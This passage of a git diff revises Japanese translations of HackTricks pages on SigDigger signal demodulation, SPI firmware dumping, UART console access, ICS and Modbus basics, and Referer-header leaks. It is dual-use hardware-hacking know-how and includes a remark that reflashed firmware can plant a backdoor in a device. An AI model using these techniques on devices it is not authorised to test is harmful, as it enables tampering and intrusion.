-GUIの動作では、PCがサポートしている場合は、いくつかの項目を有効にすることをお勧めします：
+GUIの動作では、PCがサポートしている場合は、いくつかの設定を有効にすることをお勧めします：
 
 ![](<../../images/image (472).png>)
 
 > [!NOTE]
-> PCが信号をキャプチャしていない場合は、OpenGLを無効にし、サンプルレートを下げてみてください。
+> PCが情報をキャプチャしていない場合は、OpenGLを無効にし、サンプルレートを下げてみてください。
 
-### 使用法
+### Uses
 
 - **信号の一部をキャプチャして分析する**には、「Push to capture」ボタンを必要なだけ押し続けてください。
 
@@ -30,16 +30,16 @@ GUIの動作では、PCがサポートしている場合は、いくつかの項
 
 ![](<../../images/image (1099).png>)
 
-### 無線チャンネルとの同期
+### Synchronize with radio channel
 
 [**SigDigger** ](https://github.com/BatchDrake/SigDigger)を使用して、聞きたいチャンネルと同期し、「Baseband audio preview」オプションを設定し、送信されるすべての情報を取得するための帯域幅を設定し、ノイズが本当に増加し始める前のレベルにチューナーを設定します：
 
 ![](<../../images/image (585).png>)
 
-## 興味深いトリック
+## Interesting tricks
 
 - デバイスが情報のバーストを送信しているとき、通常、**最初の部分はプレアンブル**になるため、そこに**情報が見つからない場合やエラーがある場合**は**心配する必要はありません**。
-- 情報のフレームでは、通常、**異なるフレームが互いにうまく整列している**はずです：
+- 情報のフレームでは、通常、**異なるフレームが互いに整列しているのを見つけるべきです**：
 
 ![](<../../images/image (1076).png>)
 
@@ -48,29 +48,29 @@ GUIの動作では、PCがサポートしている場合は、いくつかの項
 - **ビットを回復した後、何らかの方法で処理する必要があるかもしれません**。たとえば、マンチェスター符号化では、上+下は1または0、下+上はもう一方になります。したがって、1と0のペア（上昇と下降）は、実際の1または実際の0になります。
 - 信号がマンチェスター符号化を使用している場合（連続して2つ以上の0または1を見つけることは不可能です）、**プレアンブル内で複数の1または0を見つけることができるかもしれません**！
 
-### IQを使用した変調タイプの解明
+### Uncovering modulation type with IQ
 
 信号に情報を格納する方法は3つあります：**振幅**、**周波数**、または**位相**を変調します。\
 信号をチェックしている場合、情報を格納するために何が使用されているかを特定するためのさまざまな方法があります（以下に他の方法があります）が、良い方法の1つはIQグラフを確認することです。
 
 ![](<../../images/image (788).png>)
 
-- **AMの検出**：IQグラフに**2つの円**（おそらく1つは0、もう1つは異なる振幅にある）が表示される場合、これはAM信号である可能性があります。これは、IQグラフで0と円の間の距離が信号の振幅であるため、異なる振幅が使用されているのを視覚化しやすいからです。
-- **PMの検出**：前の画像のように、互いに関連しない小さな円を見つけた場合、位相変調が使用されている可能性があります。これは、IQグラフで点と0,0の間の角度が信号の位相であるため、4つの異なる位相が使用されていることを意味します。
+- **AMの検出**：IQグラフに**2つの円**（おそらく1つは0、もう1つは異なる振幅にある）を見つけた場合、これはAM信号である可能性があります。これは、IQグラフで0と円の間の距離が信号の振幅であるため、異なる振幅が使用されているのを視覚化しやすいからです。
+- **PMの検出**：前の画像のように、互いに関連しない小さな円を見つけた場合、位相変調が使用されている可能性があります。これは、IQグラフで、点と0,0の間の角度が信号の位相であるため、4つの異なる位相が使用されていることを意味します。
 - 情報が位相の変化に隠されていて、位相自体には隠されていない場合、異なる位相が明確に区別されることはありません。
 - **FMの検出**：IQには周波数を識別するためのフィールドがありません（中心からの距離は振幅で、角度は位相です）。\
 したがって、FMを識別するには、このグラフで**基本的に円だけを見る必要があります**。\
-さらに、異なる周波数はIQグラフによって**円を横切る速度の加速**で「表現」されます（したがって、SysDiggerで信号を選択するとIQグラフが生成され、生成された円の加速や方向の変化が見つかると、これはFMである可能性があります）：
+さらに、異なる周波数は、IQグラフによって**円を横切る速度の加速**で「表現」されます（したがって、SysDiggerで信号を選択するとIQグラフが生成され、生成された円の加速や方向の変化が見つかると、これはFMである可能性があります）：
 
-## AMの例
+## AM Example
 
 {% file src="../../images/sigdigger_20220308_165547Z_2560000_433500000_float32_iq.raw" %}
 
-### AMの解明
+### Uncovering AM
 
-#### エンベロープの確認
+#### Checking the envelope
 
-[**SigDigger** ](https://github.com/BatchDrake/SigDigger)を使用してAM情報を確認し、**エンベロープ**を見ていると、異なる明確な振幅レベルが見えます。使用されている信号は、AMで情報を送信するパルスを送信しており、1つのパルスは次のようになります：
+[**SigDigger** ](https://github.com/BatchDrake/SigDigger)を使用してAM情報を確認し、**エンベロープ**を見て、異なる明確な振幅レベルを確認できます。使用されている信号は、AMで情報を送信するパルスを送信しており、1つのパルスは次のようになります：
 
 ![](<../../images/image (590).png>)
 
@@ -78,41 +78,41 @@ GUIの動作では、PCがサポートしている場合は、いくつかの項
 
 ![](<../../images/image (734).png>)
 
-#### ヒストグラムの確認
+#### Checking the Histogram
 
-情報がある信号全体を**選択**し、**振幅**モードと**選択**を選択して**ヒストグラム**をクリックします。2つの明確なレベルだけが見つかることが観察できます。
+情報がある信号全体を**選択**し、**振幅**モードと**選択**を選択して**ヒストグラム**をクリックできます。2つの明確なレベルのみが見つかることが観察できます。
 
 ![](<../../images/image (264).png>)
 
-たとえば、このAM信号で振幅の代わりに周波数を選択すると、1つの周波数しか見つかりません（周波数で変調された情報が1つの周波数だけを使用していることはありません）。
+たとえば、このAM信号で振幅の代わりに周波数を選択すると、1つの周波数しか見つかりません（周波数で変調された情報が1つの周波数を使用していることはありません）。
 
 ![](<../../images/image (732).png>)
 
 多くの周波数が見つかる場合、これはFMではない可能性が高く、信号の周波数はチャンネルの影響で変更された可能性があります。
 
-#### IQを使用して
+#### With IQ
 
-この例では、**大きな円**があることがわかりますが、**中心に多くの点もあります**。
+この例では、**大きな円**があることがわかりますが、**中心に多くの点があります**。
 
 ![](<../../images/image (222).png>)
 
-### シンボルレートの取得
+### Get Symbol Rate
 
-#### 1つのシンボルで
+#### With one symbol
 
-見つけられる最小のシンボルを選択し（それが1つだけであることを確認）、"Selection freq"を確認します。この場合、1.013kHz（つまり1kHz）になります。
+見つけた最小のシンボルを選択し（それが1つだけであることを確認）、"Selection freq"を確認します。この場合、1.013kHz（つまり1kHz）になります。
 
 ![](<../../images/image (78).png>)
 
-#### シンボルのグループで
+#### With a group of symbols
 
-選択するシンボルの数を指定することもでき、SigDiggerは1つのシンボルの周波数を計算します（選択するシンボルが多いほど、より良い結果が得られる可能性があります）。このシナリオでは、10個のシンボルを選択し、"Selection freq"は1.004 kHzです：
+選択するシンボルの数を指定することもでき、SigDiggerは1つのシンボルの周波数を計算します（選択したシンボルが多いほど、より良い結果が得られる可能性があります）。このシナリオでは、10個のシンボルを選択し、"Selection freq"は1.004 kHzです：
 
 ![](<../../images/image (1008).png>)
 
-### ビットの取得
+### Get Bits
 
-これは**AM変調**信号であり、**シンボルレート**が見つかり（この場合、何かが上昇すると1、何かが下降すると0を意味することを知っているため）、信号にエンコードされた**ビットを取得する**のは非常に簡単です。したがって、情報のある信号を選択し、サンプリングと決定を設定してサンプルを押します（**振幅**が選択されていること、発見された**シンボルレート**が設定されていること、**Gadnerクロック回復**が選択されていることを確認してください）：
+これは**AM変調**信号であり、**シンボルレート**が見つかり（この場合、何か上は1、何か下は0を意味することを知っているため）、信号にエンコードされた**ビットを取得する**のは非常に簡単です。したがって、情報のある信号を選択し、サンプリングと決定を設定し、サンプルを押します（**振幅**が選択されていること、発見された**シンボルレート**が設定されていること、**Gadnerクロック回復**が選択されていることを確認してください）：
 
 ![](<../../images/image (965).png>)
 
@@ -125,7 +125,7 @@ GUIの動作では、PCがサポートしている場合は、いくつかの項
 
 ![](<../../images/image (644).png>)
 
-次に、SigDiggerに**情報を持つレベルの範囲**を理解させるために、**下位レベル**をクリックし、最大レベルまでクリックを維持する必要があります：
+次に、SigDiggerに**情報を持つレベルの範囲**を理解させるために、**下のレベル**をクリックし、最大のレベルまでクリックを維持する必要があります：
 
 ![](<../../images/image (439).png>)
 
@@ -135,17 +135,17 @@ GUIの動作では、PCがサポートしている場合は、いくつかの項
 
 ![](<../../images/image (276).png>)
 
-信号がシンボルあたり1ビット以上（たとえば2ビット）を持っている場合、SigDiggerには**どのシンボルが**00、01、10、11であるかを知る方法がないため、異なる**グレースケール**を使用してそれぞれを表現します（ビットをコピーすると、**0から3の数字**を使用しますので、処理が必要です）。
+信号がシンボルあたり1ビット以上（たとえば2ビット）を持っている場合、SigDiggerには**どのシンボルが**00、01、10、11であるかを知る方法がないため、異なる**グレースケール**を使用してそれぞれを表現します（ビットをコピーすると、**0から3の数字**を使用し、処理する必要があります）。
 
-また、**符号化**として**マンチェスター**を使用し、**上+下**は**1または0**、**下+上**は1または0になることがあります。その場合、取得した上昇（1）と下降（0）を処理して、01または10のペアを0または1に置き換える必要があります。
+また、**マンチェスター**などの**符号化**を使用し、**上+下**は**1または0**、**下+上**は1または0になる可能性があります。この場合、取得した上昇（1）と下降（0）を処理して、01または10のペアを0または1に置き換える必要があります。
 
-## FMの例
+## FM Example
 
 {% file src="../../images/sigdigger_20220308_170858Z_2560000_433500000_float32_iq.raw" %}
 
-### FMの解明
+### Uncovering FM
 
-#### 周波数と波形の確認
+#### Checking the frequencies and waveform
 
 FMで変調された情報を送信する信号の例：
 
@@ -155,17 +155,17 @@ FMで変調された情報を送信する信号の例：
 
 ![](<../../images/image (717).png>)
 
-これは、両方の周波数で信号をキャプチャしたため、1つは負の近似であるためです：
+これは、両方の周波数で信号をキャプチャしたため、1つは負の他の周波数に近いからです：
 
 ![](<../../images/image (942).png>)
 
-同期された周波数が**1つの周波数に近い場合**、2つの異なる周波数を簡単に見ることができます：
+同期された周波数が**他の周波数よりも1つの周波数に近い場合**、2つの異なる周波数を簡単に見ることができます：
 
 ![](<../../images/image (422).png>)
 
 ![](<../../images/image (488).png>)
 
-#### ヒストグラムの確認
+#### Checking the histogram
 
 情報を持つ信号の周波数ヒストグラムを確認すると、2つの異なる信号を簡単に見ることができます：
 
@@ -175,24 +175,24 @@ FMで変調された情報を送信する信号の例：
 
 ![](<../../images/image (817).png>)
 
-そして、これは位相ヒストグラムになります（信号が位相で変調されていないことを非常に明確に示します）：
+これは位相ヒストグラムであり、信号が位相で変調されていないことを非常に明確に示しています：
 
 ![](<../../images/image (996).png>)
 
-#### IQを使用して
+#### With IQ
 
 IQには周波数を識別するためのフィールドがありません（中心からの距離は振幅で、角度は位相です）。\
 したがって、FMを識別するには、このグラフで**基本的に円だけを見る必要があります**。\
-さらに、異なる周波数はIQグラフによって**円を横切る速度の加速**で「表現」されます（したがって、SysDiggerで信号を選択するとIQグラフが生成され、生成された円の加速や方向の変化が見つかると、これはFMである可能性があります）：
+さらに、異なる周波数は、IQグラフによって**円を横切る速度の加速**で「表現」されます（したがって、SysDiggerで信号を選択するとIQグラフが生成され、生成された円の加速や方向の変化が見つかると、これはFMである可能性があります）：
 
 ![](<../../images/image (81).png>)
 
-### シンボルレートの取得
+### Get Symbol Rate
 
-シンボルを運ぶ周波数を見つけたら、**AMの例で使用したのと同じ技術**を使用してシンボルレートを取得できます。
+周波数を持つシンボルを見つけたら、**AMの例で使用したのと同じ技術**を使用してシンボルレートを取得できます。
 
-### ビットの取得
+### Get Bits
 
-周波数で変調されている信号を**見つけた後**、**AMの例で使用したのと同じ技術**を使用してビットを取得できます。
+周波数で変調されている信号を**見つけた後、**AMの例で使用したのと同じ技術を使用してビットを取得できます。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/todo/hardware-hacking/spi.md b/src/todo/hardware-hacking/spi.md
index 020021318..deb75ac9c 100644
--- a/src/todo/hardware-hacking/spi.md
+++ b/src/todo/hardware-hacking/spi.md
@@ -6,17 +6,17 @@
 
 SPI (Serial Peripheral Interface) は、IC (Integrated Circuits) 間の短距離通信に使用される同期シリアル通信プロトコルです。SPI通信プロトコルは、クロックとチップセレクト信号によって調整されるマスター-スレーブアーキテクチャを利用します。マスター-スレーブアーキテクチャは、EEPROM、センサー、制御デバイスなどの外部周辺機器を管理するマスター（通常はマイクロプロセッサ）で構成され、これらはスレーブと見なされます。
 
-複数のスレーブがマスターに接続できますが、スレーブ同士は通信できません。スレーブは、クロックとチップセレクトの2つのピンによって管理されます。SPIは同期通信プロトコルであるため、入力ピンと出力ピンはクロック信号に従います。チップセレクトは、マスターがスレーブを選択して相互作用するために使用されます。チップセレクトが高いと、スレーブデバイスは選択されず、低いと、チップが選択され、マスターがスレーブと相互作用します。
+複数のスレーブがマスターに接続できますが、スレーブ同士は通信できません。スレーブは、クロックとチップセレクトの2つのピンによって管理されます。SPIは同期通信プロトコルであるため、入力ピンと出力ピンはクロック信号に従います。チップセレクトは、マスターがスレーブを選択し、相互作用するために使用されます。チップセレクトが高いと、スレーブデバイスは選択されず、低いと、チップが選択され、マスターがスレーブと相互作用します。
 
-MOSI (Master Out, Slave In) と MISO (Master In, Slave Out) は、データの送信と受信を担当します。データは、MOSIピンを通じてスレーブデバイスに送信され、チップセレクトが低く保たれます。入力データには、スレーブデバイスベンダーのデータシートに従った命令、メモリアドレス、またはデータが含まれます。有効な入力があると、MISOピンはマスターにデータを送信します。出力データは、入力が終了した後の次のクロックサイクルで送信されます。MISOピンは、データが完全に送信されるまで、またはマスターがチップセレクトピンを高く設定するまでデータを送信します（その場合、スレーブは送信を停止し、マスターはそのクロックサイクルの後は聞きません）。
+MOSI (Master Out, Slave In) と MISO (Master In, Slave Out) は、データの送信と受信を担当します。データは、MOSIピンを通じてスレーブデバイスに送信され、チップセレクトが低く保たれます。入力データには、スレーブデバイスベンダーのデータシートに従った命令、メモリアドレス、またはデータが含まれます。有効な入力があると、MISOピンはマスターにデータを送信します。出力データは、入力が終了した後の次のクロックサイクルで送信されます。MISOピンは、データが完全に送信されるまで、またはマスターがチップセレクトピンを高く設定するまでデータを送信します（その場合、スレーブは送信を停止し、マスターはその後のクロックサイクルでリスニングしません）。
 
-## EEPROMからのファームウェアダンプ
+## EEPROMからのファームウェアのダンプ
 
 ファームウェアのダンプは、ファームウェアを分析し、脆弱性を見つけるのに役立ちます。多くの場合、ファームウェアはインターネット上で入手できないか、モデル番号、バージョンなどの要因の変動により無関係です。したがって、物理デバイスから直接ファームウェアを抽出することは、脅威を特定する際に役立ちます。
 
 シリアルコンソールを取得することは役立ちますが、ファイルが読み取り専用であることがよくあります。これにより、さまざまな理由から分析が制約されます。たとえば、パッケージを送受信するために必要なツールがファームウェアに存在しない場合があります。したがって、バイナリを抽出して逆アセンブルすることは実行可能ではありません。したがって、システムにファームウェア全体をダンプし、分析のためにバイナリを抽出することは非常に役立ちます。
 
-また、レッドチーミング中やデバイスへの物理アクセスを取得する際に、ファームウェアをダンプすることで、ファイルを変更したり、悪意のあるファイルを注入したりして、それをメモリに再フラッシュすることができ、デバイスにバックドアを埋め込むのに役立ちます。したがって、ファームウェアダンプによって解放される可能性は無数にあります。
+また、レッドチーミング中やデバイスへの物理アクセスを取得する際に、ファームウェアをダンプすることで、ファイルを変更したり、悪意のあるファイルを注入したりして、それをメモリに再フラッシュすることができ、デバイスにバックドアを埋め込むのに役立ちます。したがって、ファームウェアのダンプによって解放される可能性は無数にあります。
 
 ### CH341A EEPROMプログラマーおよびリーダー
 
@@ -47,11 +47,11 @@ binwalk -e <filename>
 
 ![](<../../images/image (910).png>)
 
-Pirate Bus の PINOUT が **MOSI** と **MISO** に接続するためのピンを示していても、いくつかの SPI はピンを DI と DO として示す場合があります。 **MOSI -> DI, MISO -> DO**
+Pirate Bus のピンアウトが **MOSI** と **MISO** のピンを SPI に接続するように示していても、いくつかの SPI ではピンを DI と DO として示す場合があります。 **MOSI -> DI, MISO -> DO**
 
 ![](<../../images/image (360).png>)
 
-Windows または Linux では、プログラム [**`flashrom`**](https://www.flashrom.org/Flashrom) を使用して、次のようにフラッシュメモリの内容をダンプできます:
+Windows または Linux では、プログラム [**`flashrom`**](https://www.flashrom.org/Flashrom) を使用して、次のようにフラッシュメモリの内容をダンプできます。
 ```bash
 # In this command we are indicating:
 # -VV Verbose
diff --git a/src/todo/hardware-hacking/uart.md b/src/todo/hardware-hacking/uart.md
index 0046dd324..bc354b297 100644
--- a/src/todo/hardware-hacking/uart.md
+++ b/src/todo/hardware-hacking/uart.md
@@ -6,7 +6,7 @@
 
 UARTはシリアルプロトコルであり、コンポーネント間でデータを1ビットずつ転送します。対照的に、パラレル通信プロトコルは複数のチャネルを通じてデータを同時に転送します。一般的なシリアルプロトコルにはRS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express、USBがあります。
 
-一般的に、UARTがアイドル状態のとき、ラインは高い状態（論理1の値）に保たれます。次に、データ転送の開始を示すために、送信者は受信者にスタートビットを送信し、その間、信号は低い状態（論理0の値）に保たれます。次に、送信者は実際のメッセージを含む5から8ビットのデータを送信し、オプションのパリティビットと1または2のストップビット（論理1の値）を続けます。エラーチェックに使用されるパリティビットは、実際にはほとんど見られません。ストップビットは、送信の終了を示します。
+一般的に、UARTがアイドル状態のとき、ラインは高い状態（論理1の値）に保たれます。次に、データ転送の開始を示すために、送信者は受信者にスタートビットを送信し、その間、信号は低い状態（論理0の値）に保たれます。次に、送信者は実際のメッセージを含む5から8ビットのデータを送信し、オプションのパリティビットと1または2のストップビット（論理1の値）を続けます。エラーチェックに使用されるパリティビットは、実際にはほとんど見られません。ストップビット（またはビット）は、送信の終了を示します。
 
 最も一般的な構成を8N1と呼びます：8ビットのデータ、パリティなし、1つのストップビット。たとえば、Cという文字、またはASCIIで0x43を8N1 UART構成で送信したい場合、次のビットを送信します：0（スタートビット）；0、1、0、0、0、0、1、1（0x43のバイナリ値）、および0（ストップビット）。
 
@@ -24,25 +24,25 @@ UARTには4つのポートがあります：**TX**（送信）、**RX**（受信
 
 **マルチメーター**を使用し、デバイスの電源を切った状態で：
 
-- **GND**ピンを特定するには、**連続性テスト**モードを使用し、バックリードをグラウンドに置き、赤いリードでテストして、マルチメーターから音が聞こえるまで続けます。PCBには複数のGNDピンがあるため、UARTに属するものを見つけたかどうかはわかりません。
+- **GND**ピンを特定するには、**連続性テスト**モードを使用し、バックリードをグラウンドに置き、赤いリードでテストして、マルチメーターから音が聞こえるまで続けます。PCBにはいくつかのGNDピンがあるため、UARTに属するものを見つけたかどうかはわかりません。
 - **VCCポート**を特定するには、**DC電圧モード**に設定し、20Vの電圧に設定します。黒いプローブをグラウンドに、赤いプローブをピンに置き、デバイスの電源を入れます。マルチメーターが3.3Vまたは5Vの一定の電圧を測定した場合、Vccピンを見つけたことになります。他の電圧が得られた場合は、他のポートで再試行します。
-- **TX** **ポート**を特定するには、**DC電圧モード**を20Vに設定し、黒いプローブをグラウンドに、赤いプローブをピンに置き、デバイスの電源を入れます。電圧が数秒間変動し、その後Vcc値で安定する場合、TXポートを見つけた可能性が高いです。これは、電源を入れるとデバッグデータを送信するためです。
-- **RXポート**は他の3つに最も近く、電圧変動が最も少なく、すべてのUARTピンの中で最も低い全体的な値を持っています。
+- **TX** **ポート**を特定するには、**DC電圧モード**を20Vに設定し、黒いプローブをグラウンドに、赤いプローブをピンに置き、デバイスの電源を入れます。電圧が数秒間変動し、その後Vcc値で安定する場合、TXポートを見つけた可能性が高いです。これは、電源を入れるときにデバッグデータを送信するためです。
+- **RXポート**は他の3つに最も近いもので、電圧の変動が最も少なく、すべてのUARTピンの中で全体的な値が最も低いです。
 
-TXポートとRXポートを混同しても何も起こりませんが、GNDとVCCポートを混同すると回路が壊れる可能性があります。
+TXポートとRXポートを混同しても何も起こりませんが、GNDポートとVCCポートを混同すると回路が焼き切れる可能性があります。
 
 一部のターゲットデバイスでは、製造元によってRXまたはTX、または両方が無効にされている場合があります。その場合、回路基板内の接続を追跡し、ブレークアウトポイントを見つけることが役立ちます。UARTの検出が確認できず、回路が切断されていることを示す強い手がかりは、デバイスの保証を確認することです。デバイスが保証付きで出荷されている場合、製造元はデバッグインターフェース（この場合はUART）を残しており、したがって、UARTを切断し、デバッグ中に再接続する必要があります。これらのブレークアウトピンは、はんだ付けまたはジャンパーワイヤーで接続できます。
 
 ### UARTボーレートの特定
 
-正しいボーレートを特定する最も簡単な方法は、**TXピンの出力を見てデータを読み取る**ことです。受信したデータが読み取れない場合は、データが読み取れるまで次の可能なボーレートに切り替えます。これを行うには、USB-to-serialアダプタやBus Pirateのような多目的デバイスを使用し、[baudrate.py](https://github.com/devttys0/baudrate/)のようなヘルパースクリプトと組み合わせます。最も一般的なボーレートは9600、38400、19200、57600、115200です。
+正しいボーレートを特定する最も簡単な方法は、**TXピンの出力を見てデータを読み取る**ことです。受信したデータが読み取れない場合は、次の可能なボーレートに切り替えて、データが読み取れるようになるまで続けます。これを行うには、USB-to-serialアダプタやBus Pirateのような多目的デバイスを使用し、[baudrate.py](https://github.com/devttys0/baudrate/)のようなヘルパースクリプトと組み合わせます。最も一般的なボーレートは9600、38400、19200、57600、115200です。
 
 > [!CAUTION]
 > このプロトコルでは、1つのデバイスのTXを他のデバイスのRXに接続する必要があることに注意してください！
 
 ## CP210X UART to TTYアダプタ
 
-CP210Xチップは、NodeMCU（esp8266搭載）などの多くのプロトタイピングボードでシリアル通信に使用されます。これらのアダプタは比較的安価で、ターゲットのUARTインターフェースに接続するために使用できます。デバイスには5つのピンがあります：5V、GND、RXD、TXD、3.3V。ターゲットがサポートする電圧に接続して、損傷を避けてください。最後に、アダプタのRXDピンをターゲットのTXDに、アダプタのTXDピンをターゲットのRXDに接続します。
+CP210Xチップは、NodeMCU（esp8266搭載）などの多くのプロトタイピングボードでシリアル通信に使用されます。これらのアダプタは比較的安価で、ターゲットのUARTインターフェースに接続するために使用できます。デバイスには5つのピンがあります：5V、GND、RXD、TXD、3.3V。ターゲットがサポートする電圧に接続して、損傷を避けるようにしてください。最後に、アダプタのRXDピンをターゲットのTXDに、アダプタのTXDピンをターゲットのRXDに接続します。
 
 アダプタが検出されない場合は、ホストシステムにCP210Xドライバーがインストールされていることを確認してください。アダプタが検出されて接続されると、picocom、minicom、またはscreenなどのツールを使用できます。
 
@@ -58,15 +58,15 @@ minicomの設定には、次のコマンドを使用します：
 ```
 minicom -s
 ```
-`Serial port setup`オプションでボーレートやデバイス名などの設定を構成します。
+設定でボーレートやデバイス名を`Serial port setup`オプションで構成します。
 
 構成後、`minicom`コマンドを使用してUARTコンソールを起動します。
 
 ## Arduino UNO R3を介したUART（取り外し可能なAtmel 328pチップボード）
 
-UARTシリアルからUSBアダプタが利用できない場合、Arduino UNO R3を使用して簡単なハックを行うことができます。Arduino UNO R3は通常どこでも入手可能なため、これにより多くの時間を節約できます。
+UARTシリアルからUSBアダプタが利用できない場合、Arduino UNO R3を使って簡単にハックできます。Arduino UNO R3は通常どこでも入手可能なため、これにより多くの時間を節約できます。
 
-Arduino UNO R3には、ボード自体にUSBからシリアルへのアダプタが組み込まれています。UART接続を得るには、ボードからAtmel 328pマイクロコントローラーチップを抜き出すだけです。このハックは、Atmel 328pがボードにハンダ付けされていないArduino UNO R3のバリアント（SMDバージョンが使用されています）で機能します。ArduinoのRXピン（デジタルピン0）をUARTインターフェースのTXピンに接続し、ArduinoのTXピン（デジタルピン1）をUARTインターフェースのRXピンに接続します。
+Arduino UNO R3には、ボード自体にUSBからシリアルへのアダプタが組み込まれています。UART接続を得るには、ボードからAtmel 328pマイクロコントローラーチップを抜くだけです。このハックは、Atmel 328pがボードにハンダ付けされていないArduino UNO R3のバリアント（SMDバージョンが使用されています）で機能します。ArduinoのRXピン（デジタルピン0）をUARTインターフェースのTXピンに、ArduinoのTXピン（デジタルピン1）をUARTインターフェースのRXピンに接続します。
 
 最後に、シリアルコンソールを取得するためにArduino IDEを使用することをお勧めします。メニューの`tools`セクションで`Serial Console`オプションを選択し、UARTインターフェースに応じてボーレートを設定します。
 
@@ -160,14 +160,14 @@ UARTコンソールからファームウェアをダンプするには、まず
 ```
 md
 ```
-"メモリダンプ"を意味します。これにより、メモリ（EEPROMコンテンツ）が画面にダンプされます。メモリダンプをキャプチャするために、手順を開始する前にシリアルコンソールの出力をログに記録することをお勧めします。
+"memory dump"を意味します。これにより、メモリ（EEPROMコンテンツ）が画面にダンプされます。メモリダンプをキャプチャするために、手順を開始する前にシリアルコンソールの出力をログに記録することをお勧めします。
 
 最後に、ログファイルから不要なデータをすべて削除し、ファイルを`filename.rom`として保存し、binwalkを使用して内容を抽出します：
 ```
 binwalk -e <filename.rom>
 ```
-この内容は、HEXファイルに見つかった署名に基づいて、EEPROMからの可能な内容をリストします。
+この内容は、HEXファイルに見つかった署名に基づいてEEPROMからの可能な内容をリストします。
 
-ただし、使用されている場合でも、ubootがアンロックされているとは限らないことに注意する必要があります。Enterキーが何も反応しない場合は、Spaceキーなどの異なるキーを確認してください。ブートローダーがロックされていて中断されない場合、この方法は機能しません。ubootがデバイスのブートローダーであるかどうかを確認するには、デバイスのブート中にUARTコンソールの出力を確認してください。ブート中にubootが表示されるかもしれません。
+ただし、使用されている場合でもubootがアンロックされているとは限らないことに注意する必要があります。Enterキーが何も反応しない場合は、Spaceキーなどの異なるキーを確認してください。ブートローダーがロックされていて中断されない場合、この方法は機能しません。ubootがデバイスのブートローダーであるかどうかを確認するには、デバイスのブート中にUARTコンソールの出力を確認してください。ブート中にubootが表示されるかもしれません。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md
index 406a8ec4d..3fddb20f1 100644
--- a/src/todo/industrial-control-systems-hacking/README.md
+++ b/src/todo/industrial-control-systems-hacking/README.md
@@ -6,9 +6,9 @@
 
 産業用制御システムは至る所に存在し、産業は国家の経済発展にとって重要です。しかし、これらのICSは更新が難しく、この分野での進展は少ないです。そのため、セキュリティの欠陥を見つけることは一般的です。ここで使用されるプロトコルや標準のほとんどは90年代に開発されており、現在の攻撃シナリオと比較して能力がはるかに低いです。
 
-これらのシステムを保護することが重要になってきています。損傷を与えることは多大なコストを伴い、最悪の場合は命に関わることもあります。産業用制御システムのセキュリティを理解するためには、その内部を知ることが必要です。
+これらのシステムを保護することが重要になってきました。損傷を与えることは多大なコストを伴い、最悪の場合には命に関わることもあります。産業用制御システムのセキュリティを理解するためには、その内部を知ることが必要です。
 
-産業用制御システムは、定められた標準に従って設置されるため、各コンポーネントを知ることは、制御システム内の他のメカニズムを相互接続するのに役立ちます。PLCやSCADAシステムなどのデバイスの設置は、さまざまな産業で異なるため、情報収集が重要です。
+産業用制御システムは設定された標準に従ってインストールされるため、各コンポーネントを知ることは、制御システム内の他のメカニズムを相互接続するのに役立ちます。PLCやSCADAシステムなどのデバイスのインストールは、さまざまな産業で異なるため、情報収集が重要です。
 
 産業用制御システムは時に複雑であり、何かを行うには多くの忍耐が必要です。攻撃を計画し、エクスプロイトを開発する前に、すべてはプロービングと偵察に関することです。
 
diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md
index 5e7438cd7..92a0b5591 100644
--- a/src/todo/industrial-control-systems-hacking/modbus.md
+++ b/src/todo/industrial-control-systems-hacking/modbus.md
@@ -8,11 +8,11 @@ Modbusプロトコルは、産業オートメーションおよび制御シス
 
 ## クライアント-サーバーアーキテクチャ
 
-Modbusプロトコルは、通常、クライアントサーバーアーキテクチャとして使用され、マスターデバイス（クライアント）が1つ以上のスレーブデバイス（サーバー）との通信を開始します。これはマスター-スレーブアーキテクチャとも呼ばれ、電子機器やIoTで広く使用されています（SPI、I2Cなど）。
+Modbusプロトコルは、通常、クライアントサーバーアーキテクチャとして使用され、マスターデバイス（クライアント）が1つ以上のスレーブデバイス（サーバー）との通信を開始します。これはマスター-スレーブアーキテクチャとも呼ばれ、電子機器やIoTで広く使用されています。
 
 ## シリアルおよびイーサネットバージョン
 
-Modbusプロトコルは、シリアル通信とイーサネット通信の両方に対応するように設計されています。シリアル通信はレガシーシステムで広く使用されている一方、現代のデバイスはイーサネットをサポートしており、高速データレートを提供し、現代の産業ネットワークにより適しています。
+Modbusプロトコルは、シリアル通信とイーサネット通信の両方に対応するように設計されています。シリアル通信はレガシーシステムで広く使用されている一方、現代のデバイスはイーサネットをサポートしており、高データレートを提供し、現代の産業ネットワークにより適しています。
 
 ## データ表現
 
diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md
index 44f2be2fe..16ec6ba2b 100644
--- a/src/todo/interesting-http.md
+++ b/src/todo/interesting-http.md
@@ -6,11 +6,11 @@
 
 ## 機密情報の漏洩
 
-ウェブページ内のどこかに機密情報がGETリクエストパラメータに存在する場合、そのページが外部ソースへのリンクを含んでいるか、攻撃者がユーザーに攻撃者が制御するURLを訪問させることができる（ソーシャルエンジニアリング）場合、最新のGETリクエスト内の機密情報を抽出できる可能性があります。
+ウェブページ内のどこかに機密情報がGETリクエストパラメータに存在する場合、そのページが外部ソースへのリンクを含んでいるか、攻撃者がユーザーに攻撃者が制御するURLを訪問させることができる（ソーシャルエンジニアリング）場合、最新のGETリクエスト内の機密情報を抽出することができる可能性があります。
 
 ## 緩和策
 
-ブラウザに**リファラーポリシー**に従わせることで、機密情報が他のウェブアプリケーションに送信されるのを**回避**することができます：
+ブラウザに**リファラーポリシー**を遵守させることで、機密情報が他のウェブアプリケーションに送信されるのを**回避**することができます：
 ```
 Referrer-Policy: no-referrer
 Referrer-Policy: no-referrer-when-downgrade
@@ -30,6 +30,6 @@ Referrer-Policy: unsafe-url
 ```
 ## 防御
 
-決してGETパラメータやURLのパスに機密データを入れないでください。
+GETパラメータやURLのパスに機密データを入れないでください。
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md
index 66bcef1e4..b4e6f53af 100644
--- a/src/todo/investment-terms.md
+++ b/src/todo/investment-terms.md
@@ -14,7 +14,7 @@
 
 当然、6か月後にビットコインの価値が80,000ドルになった場合、売り手は損失を被り、買い手は利益を得ます。6か月後にビットコインの価値が60,000ドルになった場合、逆のことが起こります。
 
